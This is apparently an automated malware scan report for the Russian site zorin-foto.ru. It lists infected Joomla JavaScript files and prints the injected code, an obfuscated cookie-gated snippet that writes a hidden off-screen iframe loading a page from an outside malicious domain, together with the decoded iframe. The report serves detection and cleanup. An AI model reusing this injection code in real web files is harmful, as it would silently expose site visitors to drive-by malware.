Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zorin-foto.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://zorin-foto.ru/ | 200 OK Content-Length: 30907 Content-Type: text/html | clean |
http://zorin-foto.ru/media/system/js/caption.js | 200 OK Content-Length: 4203 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar ...[1234 bytes skipped]... okie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = docu ...[1131 bytes skipped]... Decoded script: <iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://zorin-foto.ru/plugins/content/mavikthumbnails/slimbox/js/slimbox.js | 200 OK Content-Length: 9313 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar ...[1234 bytes skipped]... okie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); var Lightbox = { init: function(options){ this.options = $extend({ resizeDuration: 400, resizeTransition: false, initialWidth: 250, initialHeight: 250, animateCaption: true, showCounter: true }, options || {}); this.anchors = ...[2216 bytes skipped]... Decoded script: <iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://zorin-foto.ru/modules/mod_vm_css_menu/js/vertical_flyout_right.js | 404 Not Found Content-Length: 20 Content-Type: text/html | clean |
http://zorin-foto.ru/test404page.js | 404 Not Found Content-Length: 20 Content-Type: text/html | clean |
http://zorin-foto.ru/templates/vsi39/script.js | 200 OK Content-Length: 16955 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar ...[1234 bytes skipped]... okie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); if (window.addEvent) window.addEvent('domready', function() { }); var artEventHelper = { 'bind': function(obj, evt, fn) { if (obj.addEventListener) obj.addEventListener(evt, fn, false); else if (obj.attachEvent) obj.attachEvent('on' + evt, fn); ...[2211 bytes skipped]... Decoded script: <iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://zorin-foto.ru//mc.yandex.ru/metrika/watch.js/ | 404 Not Found Content-Length: 307 Content-Type: text/html | clean |
http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery-1.5.2.min.js | 200 OK Content-Length: 88165 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: fsdron.yosoydos.com.ar //copyright /** * license GNU/GPL, see LICENSE.php * Joomla! is free software. This version may have been modified pursuant * to the GNU General Public License, and as distributed it includes or * is derivative of works licensed under the GNU General Public License or * other free or open source software licenses. * See COPYRIGHT.php for copyright notices and details. */ /** * JCaption javascript behavior * ...[3803 bytes skipped]... | ||
http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery.easing.1.3.js | 200 OK Content-Length: 10337 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar ...[1234 bytes skipped]... okie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*( ...[2242 bytes skipped]... Decoded script: <iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery.animate-colors-min.js | 200 OK Content-Length: 3976 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar ...[1234 bytes skipped]... okie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); (function(d){function i(){var b=d("script:first"),a=b.css("color"),c=false;if(/^rgba/.test(a))c=true;else try{c=a!=b.css("color","rgba(0, 0, 0, 0.5)").css("color");b.css("color",a)}catch(e){}return c}function g(b,a,c){var e="rgb"+(d.support.rgba?"a":"")+"("+parseInt(b[0]+c*(a[0]-b[0]), ...[1287 bytes skipped]... Decoded script: <iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
http://zorin-foto.ru/modules/mod_AutsonSlideShow/js/jquery.skitter.min.js | 200 OK Content-Length: 52419 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: fsdron.yosoydos.com.ar ...[1234 bytes skipped]... okie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!uigentuse()) { var cookie = getCookie('urgen7ryam9ole84kerl19nam'); if (cookie == undefined) { setCookie('urgen7ryam9ole84kerl19nam', true, 86400); document.write('<iframe'+' s'+'r'+'c'+'="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" s'+'t'+'yl'+'e'+'='+'p'+'osi'+'t'+'io'+'n'+':'+'ab'+'s'+'o'+'lut'+'e'+';'+'le'+'f'+'t:-1100px;top:-1100px; height="170" width="170"></iframe>'); } } })(); (function($){var number_skitter=0,skitters=[];$.fn.skitter=function(options){return this.each(function(){$(this).data('skitter_number',number_skitter);skitters.push(new $sk(this,options,number_skitter));++number_skitter})};var defaults={velocity:1,interval:2500,animats('transform ...[2036 bytes skipped]... Decoded script: <iframe src="http://fsdron.yosoydos.com.ar/tzmkxykx7.html" style=position:absolute;left:-1100px;top:-1100px; height="170" width="170"></iframe> | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zorin-foto.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 18:22:39 GMT
Server: nginx/1.1.19
Vary: Accept-Encoding
Content-Type: text/html; charset="utf-8"
X-Powered-By: PHP/5.3.10-1ubuntu3.13
GET / HTTP/1.1
Host: zorin-foto.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 01 Oct 2014 18:22:39 GMT
Server: nginx/1.1.19
Vary: Accept-Encoding
Content-Type: text/html; charset="utf-8"
X-Powered-By: PHP/5.3.10-1ubuntu3.13
Second query (visit from search engine):
GET / HTTP/1.1
Host: zorin-foto.ru
Referer: http://www.google.com/search?q=zorin-foto.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zorin-foto.ru
Referer: http://www.google.com/search?q=zorin-foto.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.